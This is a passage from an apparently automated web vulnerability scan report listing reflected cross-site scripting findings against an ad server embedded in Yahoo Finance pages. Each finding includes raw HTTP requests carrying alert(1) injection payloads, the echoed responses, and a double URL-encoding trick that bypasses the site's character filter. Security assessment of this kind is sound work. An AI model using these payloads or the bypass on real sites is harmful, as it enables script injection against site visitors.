9/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&9eee0"><script>alert(1)</script>6e2d4d7b31a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [ybt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 730fc</script><script>alert(1)</script>bd8245d2a0a was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319730fc</script><script>alert(1)</script>bd8245d2a0a&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830206**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319730fc</script><script>alert(1)</script>bd8245d2a0a&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239
...[SNIP]...

1.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yhdata parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b4c</script><script>alert(1)</script>a92a4ea5c17 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=e7b4c</script><script>alert(1)</script>a92a4ea5c17&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:37:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829823**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=e7b4c</script><script>alert(1)</script>a92a4ea5c17&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW8
...[SNIP]...

1.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yyob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56e5b</script><script>alert(1)</script>23422258c5c was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=56e5b</script><script>alert(1)</script>23422258c5c&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830000**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=56e5b</script><script>alert(1)</script>23422258c5c&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8
...[SNIP]...

1.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87c</script><script>alert(1)</script>02b34734fdd was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,bf87c</script><script>alert(1)</script>02b34734fdd&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830120**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,bf87c</script><script>alert(1)</script>02b34734fdd&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/
...[SNIP]...

1.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30463%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6ce9bcd3b8 was submitted in the REST URL parameter 2. This input was echoed as 30463"><script>alert(1)</script>b6ce9bcd3b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135730463%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6ce9bcd3b8/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135730463"><script>alert(1)</script>b6ce9bcd3b8/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 601bb%2522%253balert%25281%2529%252f%252f9b6ae25f873 was submitted in the REST URL parameter 2. This input was echoed as 601bb";alert(1)//9b6ae25f873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601bb%2522%253balert%25281%2529%252f%252f9b6ae25f873/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357601bb";alert(1)//9b6ae25f873/477.0.iframe.150x30/1300830325**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14
...[SNIP]...

1.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bc31f1bcec was submitted in the REST URL parameter 3. This input was echoed as 17fda"><script>alert(1)</script>8bc31f1bcec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3017fda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bc31f1bcec/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3017fda"><script>alert(1)</script>8bc31f1bcec/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f254f%2522%253balert%25281%2529%252f%252f5c21c8d846b was submitted in the REST URL parameter 3. This input was echoed as f254f";alert(1)//5c21c8d846b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30f254f%2522%253balert%25281%2529%252f%252f5c21c8d846b/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30f254f";alert(1)//5c21c8d846b/1300830337**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"1deab7fe4c4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*3fdca"-alert(1)-"1deab7fe4c4 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2633

